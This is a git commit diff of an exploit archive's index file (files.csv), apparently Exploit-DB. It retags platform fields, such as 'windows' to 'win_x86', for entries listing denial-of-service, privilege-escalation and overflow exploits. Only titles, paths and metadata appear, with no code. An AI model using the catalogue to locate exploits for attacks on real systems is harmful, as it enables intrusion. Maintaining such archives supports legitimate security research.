DB: 2017-02-01
65 new exploits Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow 32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC) Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC) ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC) Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read Samba < 3.6.2 (x86) - Denial of Serviec (PoC) Adobe Flash - Bad Dereference at 0x23c on Linux x64 Adobe Flash (Linux x64) - Bad Dereference at 0x23c Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Core FTP Server 32-bit Build 587 - Heap Overflow Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC) Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC) RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid) Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation Wireless Tools 26 (IWConfig) - Privilege Escalation Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure Rocks Clusters 4.1 - (umount-loop) Privilege Escalation Rocks Clusters 4.1 - (mount-loop) Privilege Escalation Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation Postfix 2.6-20080814 - (symlink) Privilege Escalation Postfix 2.6-20080814 - 'symlink' Privilege Escalation Oracle Database Vault - ptrace(2) Privilege Escalation Oracle Database Vault - 'ptrace(2)' Privilege Escalation Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation) GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1) Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit) Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit) VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit) PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation PolicyKit polkit-1 < 0.101 - Privilege Escalation Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111) Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111) MySQL 3.23.x - mysqld Privilege Escalation MySQL 3.23.x - 'mysqld' Privilege Escalation Platform Load Sharing Facility 4/5/6 - EAuth Privilege Escalation MTools 3.9.x - MFormat Privilege Escalation Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation MTools 3.9.x - 'MFormat' Privilege Escalation Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1) sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass sudo 1.8.0 < 1.8.3p1 (sudo_debug) - glibc FORTIFY_SOURCE Bypass + Privilege Escalation Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2) ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3) LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit) Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3) TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure Linux Kernel 3.13 - Privilege Escalation PoC (SGID) Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC) OSSEC 2.8 - hosts.deny Privilege Escalation OSSEC 2.8 - 'hosts.deny' Privilege Escalation Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting) Linux (x86) - Memory Sinkhole Privilege Escalation (PoC) Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation Linux (x86) - Memory Sinkhole Privilege Escalation (PoC) RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation MySQL 5.5.45 (x64) - Local Credentials Disclosure Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072) Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072) Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) Viscosity 1.6.7 - Privilege Escalation BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution Solaris /bin/login (SPARC/x86) - Remote Code Execution gpsdrive 2.09 (x86) - (friendsd2) Remote Format String PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit) dproxy-nexgen (Linux/x86) - Buffer Overflow dproxy-nexgen (Linux x86) - Buffer Overflow 32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow 32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow 32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH) 32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit) 32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow 32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow 32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH) 32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit) Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit) AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit) 32bit FTP Client - Stack Buffer Overflow (Metasploit) Free Download Manager - Remote Control Server Buffer Overflow (Metasploit) Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit) Apache (Windows x86) - Chunked Encoding (Metasploit) PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit) CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit) Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit) Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit) Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit) Webmin 0.x - RPC Function Privilege Escalation Webmin 0.x - 'RPC' Function Privilege Escalation Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit technote 7.2 - Remote File Inclusion Technote 7.2 - Remote File Inclusion JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting Jaws 0.2/0.3 - 'gadget' Parameter Traversal Arbitrary File Access Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting JAWS 0.2/0.3/0.4 - ControlPanel.php SQL Injection Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection JAWS Glossary 0.4/0.5 - Cross-Site Scripting Jaws Glossary 0.4/0.5 - Cross-Site Scripting JAWS 0.x - Remote File Inclusion Jaws 0.x - Remote File Inclusion FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities Multiple Netgear Routers - Password Disclosure Video Sharing Script 4.94 - 'uid' Parameter SQL Injection Netman 204 - Backdoor Account / Password Reset
This commit is contained in:
parent
bf6526a40b
commit
1a4e6f50a9
70 changed files with 574 additions and 135 deletions
204
files.csv
204
files.csv
|
@ -356,7 +356,7 @@ id,file,description,date,author,platform,type,port
|
|||
1967,platforms/windows/dos/1967.c,"Microsoft Windows - TCP/IP Protocol Driver Remote Buffer Overflow",2006-06-30,Preddy,windows,dos,0
|
||||
1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0
|
||||
1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow",2006-07-02,RunningBon,windows,dos,0
|
||||
1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,windows,dos,0
|
||||
1977,platforms/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,win_x86,dos,0
|
||||
1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0
|
||||
1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0
|
||||
1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0
|
||||
|
@ -531,7 +531,7 @@ id,file,description,date,author,platform,type,port
|
|||
3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,windows,dos,0
|
||||
3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,windows,dos,0
|
||||
3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0
|
||||
3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,windows,dos,0
|
||||
3527,platforms/win_x86/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,win_x86,dos,0
|
||||
3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - (Digest domain) Denial of Service",2007-03-21,MADYNES,hardware,dos,0
|
||||
3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,windows,dos,0
|
||||
3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0
|
||||
|
@ -622,12 +622,12 @@ id,file,description,date,author,platform,type,port
|
|||
4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0
|
||||
4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0
|
||||
4289,platforms/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0
|
||||
4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,windows,dos,0
|
||||
4293,platforms/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,win_x86,dos,0
|
||||
4294,platforms/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
|
||||
4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
|
||||
4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
|
||||
4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0
|
||||
4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,windows,dos,0
|
||||
4318,platforms/win_x86/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,win_x86,dos,0
|
||||
4319,platforms/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
|
||||
4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash",2007-08-29,wushi,windows,dos,0
|
||||
4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
|
||||
|
@ -1044,7 +1044,7 @@ id,file,description,date,author,platform,type,port
|
|||
8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0
|
||||
8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,windows,dos,0
|
||||
8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos,0
|
||||
8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",windows,dos,0
|
||||
8611,platforms/win_x86/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",win_x86,dos,0
|
||||
8617,platforms/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,windows,dos,0
|
||||
8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)",2009-05-07,GoLd_M,windows,dos,0
|
||||
8644,platforms/windows/dos/8644.pl,"ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos,0
|
||||
|
@ -1183,7 +1183,7 @@ id,file,description,date,author,platform,type,port
|
|||
9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0
|
||||
9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0
|
||||
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0
|
||||
9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0
|
||||
9606,platforms/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",win_x86,dos,0
|
||||
9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0
|
||||
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0
|
||||
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0
|
||||
|
@ -1243,7 +1243,7 @@ id,file,description,date,author,platform,type,port
|
|||
10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515
|
||||
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
|
||||
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21
|
||||
10102,platforms/windows/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80
|
||||
10102,platforms/win_x86/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",win_x86,dos,80
|
||||
10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0
|
||||
10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21
|
||||
10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
|
||||
|
@ -1520,7 +1520,7 @@ id,file,description,date,author,platform,type,port
|
|||
12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0
|
||||
12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0
|
||||
12437,platforms/windows/dos/12437.html,"Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0
|
||||
12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0
|
||||
12457,platforms/win_x86/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,win_x86,dos,0
|
||||
12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0
|
||||
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
|
||||
12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
|
||||
|
@ -1533,7 +1533,7 @@ id,file,description,date,author,platform,type,port
|
|||
12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos,0
|
||||
12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0
|
||||
12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
|
||||
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
|
||||
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
|
||||
12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
|
||||
12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
|
||||
12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial of Service",2010-05-09,"Yakir Wizman",windows,dos,0
|
||||
|
@ -4244,7 +4244,7 @@ id,file,description,date,author,platform,type,port
|
|||
33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0
|
||||
33560,platforms/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 - WebDAV Format String",2010-01-22,Intevydis,multiple,dos,0
|
||||
33571,platforms/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0
|
||||
33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0
|
||||
33585,platforms/lin_x86-64/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",lin_x86-64,dos,0
|
||||
33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
|
||||
33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0
|
||||
33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0
|
||||
|
@ -4388,7 +4388,7 @@ id,file,description,date,author,platform,type,port
|
|||
35173,platforms/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0
|
||||
35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
|
||||
35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
|
||||
35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0
|
||||
35182,platforms/win_x86/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,win_x86,dos,0
|
||||
35202,platforms/windows/dos/35202.py,"Microsoft Internet Explorer 11 - Denial of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0
|
||||
35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0
|
||||
35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0
|
||||
|
@ -4513,7 +4513,7 @@ id,file,description,date,author,platform,type,port
|
|||
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
|
||||
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
|
||||
36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
|
||||
36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,linux,dos,0
|
||||
36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,lin_x86,dos,0
|
||||
36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
|
||||
36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
|
||||
36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
|
||||
|
@ -4642,7 +4642,7 @@ id,file,description,date,author,platform,type,port
|
|||
37865,platforms/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
|
||||
37866,platforms/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37867,platforms/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37868,platforms/linux/dos/37868.txt,"Adobe Flash - Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37868,platforms/lin_x86-64/dos/37868.txt,"Adobe Flash (Linux x64) - Bad Dereference at 0x23c",2015-08-19,"Google Security Research",lin_x86-64,dos,0
|
||||
37869,platforms/linux/dos/37869.txt,"Adobe Flash - Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37870,platforms/linux/dos/37870.txt,"Adobe Flash - Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37871,platforms/multiple/dos/37871.txt,"Adobe Flash - swapDepths Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
|
||||
|
@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
|
|||
39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",windows,dos,0
|
||||
